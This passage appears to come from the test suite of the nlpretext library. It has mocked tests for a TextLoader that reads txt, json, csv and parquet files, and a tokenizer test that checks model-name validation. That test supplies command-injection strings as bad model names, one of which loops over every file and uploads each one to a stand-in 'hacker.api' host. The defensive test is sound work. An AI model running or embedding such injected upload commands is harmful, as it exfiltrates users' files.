actual_result.compute().reset_index(drop=True))\n\n\n@patch(\"pandas.read_fwf\")\ndef test__read_text_txt_pandas(mock_read_text):\n    # Given\n    files_path = \"some_path/to_read.txt\"\n    file_format = \"txt\"\n    encoding = \"utf-8\"\n    text_column = \"text\"\n    mock_read_text.return_value = pd.DataFrame(\n        {text_column: [\"This is a text\", \"This is another text\"]}\n    )\n\n    expected_result = pd.DataFrame({text_column: [\"This is a text\", \"This is another text\"]})\n\n    # When\n    dummy_instance = TextLoader(\n        file_format=file_format,\n        use_dask=False,\n        encoding=encoding,\n        text_column=text_column,\n    )\n    actual_result = dummy_instance._read_text_txt(files_path)\n\n    # Then\n    mock_read_text.assert_called_once_with(\n        str(Path(files_path).absolute()), encoding=encoding, colspecs=[(None, None)]\n    )\n    assert_frame_equal(expected_result, actual_result.reset_index(drop=True))\n\n\n@patch(\"nlpretext._utils.daskloader.dd\")\ndef test__read_text_json_dask(mock_read):\n    # Given\n    files_path = \"some_path/to_read.json\"\n    file_format = \"json\"\n    encoding = \"utf-8\"\n    text_column = \"text\"\n\n    text_ddf = dd.from_pandas(\n        pd.DataFrame({text_column: [\"This is a text\", \"This is another text\"]}),\n        npartitions=2,\n    )\n    mock_read.read_json.return_value = text_ddf\n\n    expected_result = text_ddf[[text_column]]\n\n    # When\n    dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)\n    actual_result = dummy_instance._read_text_json(files_path)\n\n    # Then\n    mock_read.read_json.assert_called_once_with(files_path, encoding=encoding)\n    assert_frame_equal(expected_result.compute(), actual_result.compute())\n\n\n@patch(\"nlpretext._utils.pandasloader.read_json\")\ndef test__read_text_json_pandas(mock_read):\n    # Given\n    files_path = \"some_path/to_read.txt\"\n    file_format = \"txt\"\n    encoding = \"utf-8\"\n    text_column = \"text\"\n\n    dummy_instance = TextLoader(\n        file_format=file_format,\n        use_dask=False,\n        encoding=encoding,\n        text_column=text_column,\n    )\n    dummy_instance._read_text_json(files_path)\n\n    # Then\n    mock_read.assert_called_once_with(files_path, encoding=encoding)\n\n\n@patch(\"dask.dataframe.read_csv\")\ndef test__read_text_csv_dask(mock_read_csv):\n    # Given\n    files_path = \"some_path/to_read.csv\"\n    file_format = \"csv\"\n    encoding = \"utf-8\"\n    text_column = \"text\"\n\n    text_ddf = dd.from_pandas(\n        pd.DataFrame({text_column: [\"This is a text\", \"This is another text\"]}),\n        npartitions=2,\n    )\n    mock_read_csv.return_value = text_ddf\n\n    expected_result = text_ddf[[text_column]]\n\n    # When\n    dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)\n    actual_result = dummy_instance._read_text_csv(files_path)\n\n    # Then\n    mock_read_csv.assert_called_once_with(files_path, encoding=encoding)\n    assert_frame_equal(expected_result.compute(), actual_result.compute())\n\n\n@patch(\"nlpretext._utils.pandasloader.read_csv\")\ndef test__read_text_csv_pandas(mock_read):\n    # Given\n    files_path = \"some_path/to_read.txt\"\n    file_format = \"txt\"\n    encoding = \"utf-8\"\n    text_column = \"text\"\n\n    dummy_instance = TextLoader(\n        file_format=file_format,\n        use_dask=False,\n        encoding=encoding,\n        text_column=text_column,\n    )\n    dummy_instance._read_text_csv(files_path)\n\n    # Then\n    mock_read.assert_called_once_with(files_path, encoding=encoding)\n\n\n@patch(\"dask.dataframe.read_parquet\")\ndef test__read_text_parquet_dask(mock_read_parquet):\n    # Given\n    files_path = \"some_path/to_read.parquet\"\n    file_format = \"parquet\"\n    encoding = \"utf-8\"\n    text_column = \"text\"\n\n    text_ddf = dd.from_pandas(\n        pd.DataFrame({text_column: [\"This is a text\", \"This is another text\"]}),\n        npartitions=2,\n    )\n    mock_read_parquet.return_value = text_ddf\n\n    expected_result = text_ddf[[text_column]]\n\n    # When\n    dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)\n    actual_result = dummy_instance._read_text_parquet(files_path)\n\n    # Then\n    mock_read_parquet.assert_called_once_with(files_path, encoding=encoding)\n    assert_frame_equal(expected_result.compute(), actual_result.compute())\n\n\n@patch(\"nlpretext._utils.pandasloader.read_parquet\")\ndef test__read_text_parquet_pandas(mock_read):\n    # Given\n    files_path = \"some_path/to_read.txt\"\n    file_format = \"txt\"\n    encoding = \"utf-8\"\n    text_column = \"text\"\n\n    dummy_instance = TextLoader(\n        file_format=file_format,\n        use_dask=False,\n        encoding=encoding,\n        text_column=text_column,\n    )\n    dummy_instance._read_text_parquet(files_path)\n\n    # Then\n    mock_read.assert_called_once_with(files_path, encoding=encoding)\n\n\n@pytest.mark.parametrize(\n    \"files_path, file_format, encoding, compute_to_pandas, preprocessor, expected_format, raised\",\n    [\n        (\"text_file1.json\", None, None, True, None, \"json\", None),\n        (\"text_file2.json\", \"json\", None, True, None, \"json\", None),\n        (\"text_file3.csv\", None, \"utf-8\", True, None, \"csv\", None),\n        (\"text_file4.csv\", None, None, False, None, \"csv\", None),\n        (\"text_file3.parquet\", None, \"utf-8\", True, None, \"parquet\", None),\n        (\"text_file4.parquet\", None, None, False, None, \"parquet\", None),\n        (\"text_file5.pdf\", \"pdf\", None, False, None, \"csv\", \"Format not handled\"),\n        (\"text_file6.txt\", None, None, False, Preprocessor(), \"txt\", None),\n        (\n            \"text_file8.txt\",\n            None,\n            None,\n            False,\n            MagicMock(),\n            \"txt\",\n            \"Only NLPretext preprocessors can be specified\",\n        ),\n    ],\n)\n@patch(\"nlpretext.preprocessor.Preprocessor.run\", return_value=\"This is a text\", autospec=True)\n@patch(\"nlpretext.textloader.TextLoader._read_text_json\")\n@patch(\"nlpretext.textloader.TextLoader._read_text_txt\")\n@patch(\"nlpretext.textloader.TextLoader._read_text_csv\")\n@patch(\"nlpretext.textloader.TextLoader._read_text_parquet\")\n@patch(\"nlpretext.textloader.check_text_file_format\")\ndef test_read_text(\n    mock_check_text_file_format,\n    mock__read_text_parquet,\n    mock__read_text_csv,\n    mock__read_text_txt,\n    mock__read_text_json,\n    mock_run,\n    files_path,\n    file_format,\n    encoding,\n    compute_to_pandas,\n    preprocessor,\n    expected_format,\n    raised,\n):\n    # Given\n    text_column = \"text\"\n    if encoding is None:\n        encoding = \"utf-8\"\n\n    if file_format is None:\n        mock_check_text_file_format.return_value = expected_format\n\n    mock_reader_mapping = {\n        \"csv\": mock__read_text_csv,\n        \"txt\": mock__read_text_txt,\n        \"json\": mock__read_text_json,\n        \"parquet\": mock__read_text_parquet,\n    }\n\n    expected_result = dd.from_pandas(\n        pd.DataFrame({text_column: [\"Text with #\", \"Text with  double  space\"]}),\n        npartitions=2,\n    )\n    mock_reader_mapping.get(expected_format).return_value = expected_result  # type: ignore\n\n    # When\n    dummy_textloader = TextLoader(\n        text_column=text_column, encoding=encoding, file_format=file_format\n    )\n\n    if raised is None:\n        actual_result = dummy_textloader.read_text(\n            files_path, file_format, encoding, compute_to_pandas, preprocessor\n        )\n\n        # Then\n        if file_format is None:\n            mock_check_text_file_format.assert_called_once_with(files_path)\n\n        mock_reader_mapping[expected_format].assert_called_once_with(files_path)\n\n        if preprocessor is not None:\n            if isinstance(preprocessor, Preprocessor):\n                mock_run.assert_called()\n                preprocessed_texts = [\"Text with\", \"Text with double space\"]\n                mock_run.side_effect = preprocessed_texts\n                expected_result = dd.from_pandas(\n                    pd.DataFrame({text_column: preprocessed_texts}), npartitions=2\n                )\n\n        if not compute_to_pandas:\n            actual_result = actual_result.compute()\n        assert_frame_equal(expected_result.compute(), actual_result)\n\n    else:\n        with pytest.raises(ValueError, match=raised):\n            dummy_textloader.read_text(\n                files_path, file_format, encoding, compute_to_pandas, preprocessor\n            )\n"
  },
  {
    "path": "tests/test_tokenizer.py",
    "content": "import pytest\nfrom nlpretext.token.tokenizer import LanguageNotInstalledError, _load_spacy_model\n\n\n@pytest.mark.parametrize(\n    \"bad_model_name\",\n    [\n        (\"en_core_web_sm; chmod -x hacker\"),\n        (\n            \"fr_core_news_sm | for file in $(find .); \"\n            'do curl_command -X POST -H \"Content-Type: multipart/form-data\" '\n            '-F \"data=@${file}\" https-fake://hacker.api/upload; done'\n        ),\n    ],\n)\ndef test_load_spacy_model_validation(bad_model_name):\n    with pytest.raises(LanguageNotInstalledError) as e:\n        _load_spacy_model(bad_model_name)\n        assert bad_model_name in str(e.value)\n"
  }
]